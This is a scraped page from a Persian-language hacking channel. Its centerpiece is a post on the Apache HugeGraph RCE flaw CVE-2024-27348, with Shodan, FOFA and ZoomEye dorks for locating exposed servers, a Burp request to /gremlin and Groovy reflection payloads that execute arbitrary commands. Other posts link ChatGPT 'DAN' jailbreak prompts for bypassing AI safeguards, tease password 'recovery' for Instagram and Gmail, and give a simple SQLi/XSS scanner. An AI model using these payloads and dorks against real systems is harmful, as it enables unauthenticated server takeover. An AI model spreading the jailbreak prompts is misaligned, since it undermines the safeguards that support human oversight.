eitaa logo
Code Block
522 دنبال‌کننده
253 عکس
30 ویدیو
2 فایل
Code Block 📱کشف _ تحلیل _ توسعه 💻 کدنویسی _ امنیت _ فناوری
مشاهده در ایتا
دانلود
2.4M حجم رسانه بالاست
مشاهده در ایتا
🔻🎥بازیابی رمز اینستاگرام و جیمیل در ۳۰ ثانیه!
🔓 CVE-2024-27348 — آسیب‌پذیری بحرانی RCE در Apache HugeGraph-Server 🔓
🔓 CVE-2024-27348 — آسیب‌پذیری بحرانی RCE در Apache HugeGraph-Server 🔓 🟢 CVE-2024-27348 یک آسیب‌پذیری بسیار مهم و بحرانی (Critical) با امتیاز CVSS 9.8 در Apache HugeGraph-Server است که در نسخه‌های 1.0.0 تا قبل از 1.3.0 وجود دارد. این آسیب‌پذیری از نوع Remote Code Execution (اجرای کد از راه دور) بوده و به مهاجم اجازه می‌دهد بدون احراز هویت، دستورات دلخواه را روی سرور اجرایی کند. https://nvd.nist.gov/vuln/detail/cve-2024-27348 📌 چه اتفاقی می‌افتد؟ آسیب‌پذیری در تعامل با Gremlin (زبان پرس‌وجوی گراف) یا بخش‌های مدیریتی HugeGraph قرار دارد. مهاجم با ارسال ورودی‌های خاص می‌تواند از ضعف کنترل دسترسی سوءاستفاده کند و کد دلخواهش را روی سرور اجرا نماید. 📍 پیامدها: دسترسی کامل به سیستم افشای داده‌های حساس نصب بدافزار یا ایجاد بکدور مختل کردن سرویس‌ها و حذف/تغییر داده‌ها 👾 shodan dork 1 http.title:"HugeGraph" 2 http.html:"HugeGraph Server" 3 product:"Apache HugeGraph" 4 port:8080 "HugeGraph" 👾 fofa dork 1 app="Apache-HugeGraph" 2 title="HugeGraph" 3 body="HugeGraph Server" 4 server="HugeGraph" 5 body="gremlin" && body="HugeGraph" 6 app="Apache-HugeGraph" && port="8080" 👾ZoomEye Dorks 1 app:"Apache HugeGraph" 2 service:"HugeGraph" 3 title:"HugeGraph" exploit http://target.com/gremlin 🧪 روش تست دستی با Burp Suite ( PoC) 1 رهگیری درخواست Burp → Proxy → Intercept ON وارد مسیر /gremlin درخاست رو از گت به پست تغیر میدیم POST /gremlin HTTP/1.1 Host: target:8080 Content-Type: application/json Content-Length: ... {         "gremlin": f"def result = \"{ls}\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(result);",     } ..................... payload 1 {         "gremlin": f"Thread thread = Thread.currentThread();Class clz = Class.forName(\"java.lang.Thread\");java.lang.reflect.Field field = clz.getDeclaredField(\"name\");field.setAccessible(true);field.set(thread, \"VICARIUS\");Class processBuilderClass = Class.forName(\"java.lang.ProcessBuilder\");java.lang.reflect.Constructor constructor = processBuilderClass.getConstructor(java.util.List.class);java.util.List command = java.util.Arrays.asList({formatted_words});Object processBuilderInstance = constructor.newInstance(command);java.lang.reflect.Method startMethod = processBuilderClass.getMethod(\"start\");startMethod.invoke(processBuilderInstance);",         "bindings": {},         "language": "gremlin-groovy",         "aliases": {}     } payload 2         "gremlin": f"def result = \"{command}\".execute().text\njava.lang.reflect.Field field = Thread.currentThread().getClass().getDeclaredField(result);",     } 2 https://github.com/jakabakos/CVE-2024-27348-Apache-HugeGraph-RCE 3 https://github.com/kljunowsky/CVE-2024-27348/blob/main/CVE-2024-27348.py
لیستی از بهترین کتاب های Hکینگ دنیا که توسط افراد خیلی حرفه ای نوشته شدن Code Block
میدونستید به جای نوشتن template های ناکلی با کمک هوش مصنوعی خودش میتونید ازش بخواید براتونtemplate بنویسه ؟ ‌مثلا ما در تصویر بالا یک template که خودمون نوشته بودیم رو تست کردیم و یک دور هم با هوش مصنوعی(خودش) تست کردیم و جواب میده‌! Code Block
روش های دور زدن چت جی پی تی رو از اینجا بردارید :‌ https://github.com/0xk1h0/ChatGPT_DAN
یک قطعه کد ساده پایتونی که به شما کمک میکنه طریقه عملکرد اسکنر های اسیب پذیری رو بهتر درک کنید در این قطعه کد اسب پذیری های XSS و Sqli تست میشن⬇️
import requests import re import threading url = "http://python.scanner/labs/greetings.php?id=" payloads = { "SQLi": ["'", "' OR '1'='1", "\" OR \"1\"=\"1", "'; --", "' UNION SELECT 1,2,3 --"], "XSS": ["<script>alert('XSS')</script>", "'><img src=x onerror=alert('XSS')>"] } sqli_errors = [ "SQL syntax","SQLite3::query():", "MySQL server", "syntax error", "Unclosed quotation mark", "near 'SELECT'", "Unknown column", "Warning: mysql_fetch", "Fatal error" ] def scan_payload(vuln_type, payload): response = requests.get(url, params={"id": payload}) content = response.text.lower() if vuln_type == "SQLi" and any(error.lower() in content for error in sqli_errors): print(f"[+] Potential SQL injection detected with payload: {payload}") elif vuln_type == "XSS" and payload.lower() in content: print(f"[+] Potential XSS detected with payload: {payload}") threads = [] for vuln, tests in payloads.items(): for payload in tests: t = threading.Thread(target=scan_payload, args=(vuln, payload)) threads.append(t) t.start() # Wait for all threads to finish for t in threads: t.join()
806.5K حجم رسانه بالاست
مشاهده در ایتا
این دستگاه به آن EMP می‌گویند؛ دستگاهی که می‌تواند به دستگاه‌های الکترونیکی آسیب برساند و آن‌ها را تخریب کند. در موشک‌های جنگی و سخت‌افزارهای نظامی نیز از این تکنولوژی استفاده می‌شود.